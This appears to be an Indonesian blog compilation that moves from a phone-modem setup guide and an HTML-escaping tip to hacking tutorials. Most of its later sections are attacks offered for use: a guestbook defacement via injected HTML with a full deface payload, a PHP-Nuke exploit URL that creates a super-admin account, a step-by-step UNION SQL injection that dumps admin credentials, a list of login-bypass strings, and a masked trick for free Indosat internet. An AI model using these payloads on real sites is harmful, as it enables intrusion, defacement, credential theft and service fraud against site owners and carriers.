Cerita berawal ketika saya ingin online lebih lama dengan Yahoo messenger. Karena cuma chatting saja maka sangat tidak efisien kalau harus pakai speedy yang time based. Jadi salah satu solusinya ya pake HP sebagai modem untuk internetan. Untuk HP nya saya memakai SE W660i dan IM3.

Langkah-langkah Setting Internetan dengan modem HP Sony Ericsson W660i dan IM3..

1.Pastikan Setting GPRS di HP dah aktif.
2.Install Sony Ericsson PC Suite (bawaan dari CD nya atau bisa download di website sony ericsson).
3.Hubungkan HP dengan komputer (saya pakai kabel USB bawaan HP).
4.Pilih Phone Mode (bukan File Transfer).
5.Buka control panel --> phone and modem options selectModem HP --> klik properties --> pilih tab Advance --> tambahkan kode berikut pada Extra Setting at+cgdcont=1,”IP”,”www.indosat-m3.net”.

6.Klik Ok
Jalankan Sony Ericsson PC Suite yang sudah di install..



7.Klik Mobile Networking Wizard.
8.Pilih New Connection --> pilih packet switch data --> next.
9.Pilih modem.
10.Isi Connection Name.
11.Untuk select provider, pilih yang manual setting
12.Untuk APN isi dengan www.indosat-m3.net.
13.Isi User ID = gprs dan password = im3
catatan : bisa juga diisi dengan ID = indosat dan password = indosat.
14.Setelah selesai setting, klik connect



15.Setelah connect maka akan muncul informasi di tray icon.



Untuk biaya koneksinya saya belum hitung, Kalau nggak salah Rp. 1/kb untuk Im3 (atau dah naik ya) . Semoga panduan setting koneksi internet dengan modem hp dan kartu IM3 ini bisa bermanfaat.

update : untuk internetan IM3 time based tinggal ganti username dan passwordnya dengan indosat@durasi

Sumber : http://gangpalm.blogspot.com/2009/05/setting-koneksi-internet-dengan-modem.html

Hasil dari googlingan lagi nih. Trik internet gratis indosat [im3 & mentari]. Sumber dari sini. Berikut artikel lengkap dari Trik internet gratis indosat [im3 & mentari] tersebut.

pake browser hp biasa.pada saat akan browsing ato download msukin http://***g.i****at.com@url
contoh: http://w***g.i****at.com@c0×3r.peperonity.com

cara 2:
dg cara 2 ne,lbih nyaman drpd cra1,cz hnya btuh sting sja.ga prlu mskin embel brulang2 saat akn browsing,tp lgsung ke url yg dtuju. . .caranya,

km download opmin mod v3.1,jka blum pny bs download link dbwah.jka uda pny km set jaringanny.km msukin pada server: http://w***g.i****at.com@server.operamini.com pada shadow cetang.dan isi http://w***g.i****at.com.stlah slsai,km bs browsing2,ato download spuasny. . .

NB:Qu ga jamin trik ne bs di smw HP.HP yg pnah qu cb,n brhsil adlah SE K510&K320. . .jd jka pd ga bhsil ga usa bnyk tny.hehe. . .

N 1lgy.inget!!kl mw download jg hrus pke “http://w***g.i****at.com” bru diikti link…

Trik indosat diatas masih disamarkan. Silahkan dicari jawabanya sendiri. ;))

Untuk yang sering membuat postingan tentang kode html, maka suatu saat akan bertemu dengan kesulitan meletakkan code dalam postingan kamu. Maksud kamu akan menerangkan kode tersebut pada pengunjung blog, tapi yang terjadi malah blog kamu akan memproses sebagai perintah yang telah diterjemahkan langsung kedalam bahasa html, bukan sebagai posting. Nah untuk tahu caranya kita ikutin langkah berikut :

Contoh untuk menuliskan kode , maka yang seharusnya dituliskan supaya bisa muncul kode tersebut adalah ini . Nah terus bagaimana kalau ada banyak kode yang harus kita posting?
Mau tahu bagaimana caranya menuliskan kode2/script2 tersebut ke dalam blog?

ada 3 cara :

Cara pertama
- Gunakan software-software web design, misalnya Macromedia Dreamwaver, Microsoft Frontpage, Namao Web Editor. Atau bisa juga dengan software-software blogtools seperti post2blog dll.
- Trus tuliskan semua kode pada area design, kemudian copy kode-kode tersebut dari area HTML Code. Kode-kode dalam area HTML Code tersebut lah yang harus diposting.

Cara Kedua
- Tuliskan semua kode/script ke dalam notepad
- Kemudian ganti/replace kode-kode berikut

Kode Pengganti :
<> diganti dengan >

" diganti dengan "

- Udah tahu kan caranya mereplace di notepad? kamu pilih menu edit --> replace kemudian pada kotak yang muncul masukkan kode yg akan direplace pada kolom "Find what" trus masukkan kode pengantinya pada kolom "Replace with"trus tekan tombol Replace All.
- Kalo sudah semua baru kamu copy semua kode yang sudah direplace all tadi, trus kamu masukkan kedalam postingan kamu.

Cara Ketiga
- Open situs ini http://centricle.com/tools/html-entities atau ini juga bisa , trus isikan kode-kode kamu kedalam kotak yang disediakan, jika sudah tekan tombol "Encode", maka kamu akan mendapatkan script baru untuk diposting di blog kamu.

Selamat Mencoba...

Semoga Berhasil

Sumber : Anthblog

Dengan menggunakan teknik SQL Injection, kita bisa mendeface guestbook (bukutamu) baik file php,asp,cfm,cgi,html dan lain2.

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. www.target.my/guestbook.php
Maka yg perlu kamu lakukan adalah mengisi kolom2 guestbook yg tersedia. Kamu nggak perlu mengisi kolom guestbook nya dgn identitas asli, cukup identitas palsu saja.

contoh :
Nama : boneka lucu
Email : boneka_2005@yahoo.com
Website : www.boneka-lucu.com
Asal : toko boneka
Komentar : <img src="http://img289.imageshack.us/img289/3525/bart5fi.gif">

Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan sebuah gambar.
Trus klik tombol "submit" atau tombol apa namanya yg ada di guestbook tsb.

2. Selanjutnya buka url/browsing baru trus ketik target tadi www.target.my/guestbook.php

Kalo hasilnya belum ada, coba klik tab "refresh" di samping url/browsing. Nah...muncul deh gambar yg kita masukin tadi di guestbook tsb. Berarti guestbook tsb bisa dideface.

Catatan :
Kalo nggak ada gambarnya, yg ada hanya tulisan <img src="http://img289.imageshack.us/img289/3525/bart5fi.gif"> berarti guestbook tsb nggak bisa dideface. Kamu jgn kecewa ! cari target yg lain.

3. Kalo udah muncul gambar yg kita masukkan tadi, buka lagi guesbook tsb.
Trus isi lagi kolom2 guestbook yg tersedia.

contoh :
Nama : deface
Email : deface_2005@yahoo.com
Website : www.deface.com
Asal : dunia maya
komentar :
</DIV><DIV align=left><DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: #000000 1px; WIDTH: 1000px; BORDER-BOTTOM: #000000 1px; POSITION: absolute; TOP: 0px; HEIGHT: 10000px; BACKGROUND-COLOR: #000000; layer-background-color: #000000"><center><br><img border="0" src="http://img478.imageshack.us/img478/3472/hb6dr.jpg" width="473" height="253"><br><br><br><font face="Arial" color="#339999" size="6"><strong>J4mbi H4ck3r</strong></font><br><br><embed src="http://www.selbys.com/images/shotgun.swf" width="191" height="252"></embed><br><br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Special Thank's<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">PeNc0peT_CiNtA<br><br><br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Dedicated All Crew<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">Jambihackerlink & Solohackerlink<br><br><br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Hey admin......do you a need help ?<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">Matrix.Dal.Net - #Jambihackerlink</font><br><br><br><strong><font face="Arial" size="6" color="#339999"><marquee width="30%">We ready cybernetic war !!! </marquee></font></strong></DIV></DIV>

Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan script utk deface.

Catatan :
Sebelum kamu memasukkan script diatas tadi, kamu edit dulu kata2 nya sesuai keinginan kamu.

4. Klik tombol "submit" atau tombol apa namanya yg ada di guestbook tsb.
Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : www.target.my/guestbook.php
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.

Sumber : http://jambihackerlink.googlepages.com/DefaceGuestbook.htm

Langsung aj boss…

1.Buka situs www.google.com
2.kemudian msukkan google dork kya gene |=> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php
3.nah klw udh ktemutargetnya lnjut ne. contoh: www.sakaw.com/nuke/index.php
4.yg berwarna merah gnti dengan admin.php
5.jika sudah masukkan bug berikut ne dibelakang situs td:

?op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

misal : www.sakaw.com/nuke/admin.php?
op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

6.kemudian akan muncul www.sakaw.com/nuke/admin.php?op=mod_author pada adress bar
7. kemudian kalian akan di suruh login, masukin id & password kalian tadi.
Masih ingat kan ?
id=sakaw32 => liat yg diatas tadi
password=anjinkliar => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
so, kalian dah masuk ke situs tersebut.. tp klw tdk bsa berarti tu situs dah di path ma adminnya…

Sumber : http://www.binushacker.net/tutorial-deface-situs-php-nuke.html

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau -
comments: /* atau –
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100′ atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):

==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)…
misal: [site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–

===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–

seumpama table yang muncul adalah “admin”

===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa–

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

www.ascii-convert.co.cc

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0×61646D696E–

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0×3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,hasil isi column),6,7,8+from+(nama table berasal)–

contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,id,username,password),6,7,8+from+admin–

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login

selanjutnya terserah anda karena kekuasaan web ada di tangan anda…

Untuk Lebih Jelas Bisa Download Video Tutorial Ini Beserta File MySQL Injection

DOWNLOAD

anda langsung jalankan file ” SQL Injection.html ”

(Nb. mohon maaf apabila ada salah kata atau kekurangan dalam tutorial + video ini)


Indonesian Coder

SQL singkatan dari Structured Query Language yg merupakan bahasa komputer standar yg ditetapkan oleh ANSI (American National Standard Institute) untuk mengakses dan memanupulasi sistem database. SQL bekerja dgn program2 database seperti MS Access, DB 2, Informix, MS SQL Server, Oracle, Sybase dan lain sebagainya.

SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking utk menggapai akses pada sistem database yg berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL dalam mengolah suatu sistem database. Hasil yg ditimbulkan dari teknik ini membawa masalah yg sangat serius. Mengapa disebut SQL Injection ? seperti yg kita ketahui, injection jika diartikan ke dalam bahasa Indonesia yaitu "suntikan". Yang terjadi memang seperti melakukan suntikan terhadap SQL yg tujuannya adalah tergantung kepada pelakunya dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.

Sudah disinggung diatas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL maksudnya adalah memanfaatkan teknik string building untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yg terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yg dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang.

Keuntungan yg diambil adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya.

Input Query String

Default setting dari SQL menggunakan :

adminID = sa

password ='' (kosong atau blank)

misalnya : http://www.target.com/login.asp?adminID=sa%20password=''

%20 artinya menggantikan "jarak spasi"

Ini merupakan kondisi yg berbahaya jika pengubahan setting tidak segera dilakukan.

Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :

SQLQuery="SELECT Username FROM Users WHERE Username="'&strUsername&"'strpassword&"'

Pada verifikasi terdapat kelemahan pada pemprosesan pada string2 tertentu yg sebenarnya string tersebut dapat dikatakan sebagai input ilegal. Verifikasi tetap melakukan proses dan nantinya menghasilkan error page. Error page tersebut justru membuka rahasia struktur database dan bahkan error page tetapi eksekusi terhadap validasi input tetap dijalankan.

Contoh : menggunakan injection string 'OR''= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :

SELECT Username FROM Users WHERE Username=''OR''='' AND Password=''OR''=''

Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.

Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :

'or 1=1--

'or 0=0 --

'or 'x'='x

'or a=a-

"or 0=0 --

"or 0=0 #

"or "x"="x

")or("a"="a

admin'--

hi" or 1=1 --

hi' or'a'='a

hi")or("a"="a

or 0=0 #

'or a=a--

'or 0=0 #

'having 1=1--

"or 1=1--

"or "a"="a

')or('a'='a

')or('x'='x

hi" or "a"="a

hi' or 1=1 --

hi')or('a'='a

or 0=0 --

or 1=1--

Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang. Contoh :

'UPDATE YEPCell_memberDB set Credits=100 wher UserID='yamakasi'

SQl Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat mencarinya di www.google.com

Sumber : http://jambihackerlink.googlepages.com/KonsepDasarSQLInjection.htm